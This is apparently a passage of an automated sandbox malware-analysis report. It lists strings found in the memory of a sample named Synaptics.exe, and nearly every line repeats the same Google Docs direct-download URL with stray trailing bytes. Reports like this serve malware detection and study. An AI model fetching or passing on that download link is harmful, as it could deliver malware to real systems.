                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd.
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd0
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd1
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddate
                              Source: Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddr
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadds$
                              Source: Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd~
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade-Opt
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.com
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.use
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadecG
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeduca
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadei
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadek
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadel
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadelS
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadem
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloademg
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaden
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadervi
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadesyndIK
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadet
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadet.j?Gy-
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadet6t7Ey
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetBuCDy
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetNk_Fy%
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadevelo
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001DA14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf6oG1
                              Source: Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf:
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfZFZ
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007671000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000074F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgJlD
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadga
                              Source: Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgg
                              Source: Synaptics.exe, 00000003.00000002.2915468132.00000000053B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgin-O
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgl
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgle.
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgo
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgoog
                              Source: Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgooglF
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgv
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3027046718.0000000013D7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3059786845.0000000025CFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3041776099.000000001D8C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadha.ne.K
                              Source: Synaptics.exe, 00000003.00000002.3033199264.000000001887E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3021583271.0000000012E7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3022930792.000000001323E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3029865126.0000000015DFE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhb
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhe
                              Source: Synaptics.exe, 00000003.00000002.3046880235.000000001DA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhf
                              Source: Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadicnpfE
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadigEGE
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F1E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadin
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadin-O
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadin8
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadit
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor.
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor.j
                              Source: Synaptics.exe, 00000003.00000002.3045067074.000000001DA14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj7cF$
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007671000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk-cnuK
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk.cnhK
                              Source: Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk9
                              Source: Synaptics.exe, 00000003.00000002.3041776099.000000001D8C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk?3F
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000074F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkKpE
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                              Source: Synaptics.exe, 00000003.00000002.2918364439.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlaNE
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle
                              Source: Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle.co
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleD
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleme
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleni
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleniw
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlevaN
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlezt
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadll
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadll-vh
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadllem
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlvvkwFh#
                              Source: Synaptics.exe, 00000003.00000002.2909324806.0000000000751000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2152405545.000000000075C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlx
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.000000000068D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.00000000053D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2915468132.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
                              Source: Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm3
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadme
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadme7
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmeftgEe
                              Source: Synaptics.exe, 00000003.00000002.3014719682.000000000F407000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmx(
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmxe
                              Source: Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007589000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001DA14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3006402975.000000000F082000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2918364439.0000000007624000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3045067074.000000001D9F5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.0000000000731000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                              Source: Synaptics.exe, 00000003.00000002.3008282427.000000000F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn0gE
                              Source: Synaptics.exe, 00000003.00000002.3042852053.000000001D91D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn;
                              Source: Synaptics.exe, 00000003.00000002.3009821850.000000000F221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadname
                              Source: Synaptics.exe, 00000003.00000002.3013797152.000000000F370000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3008282427.000000000F165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnc
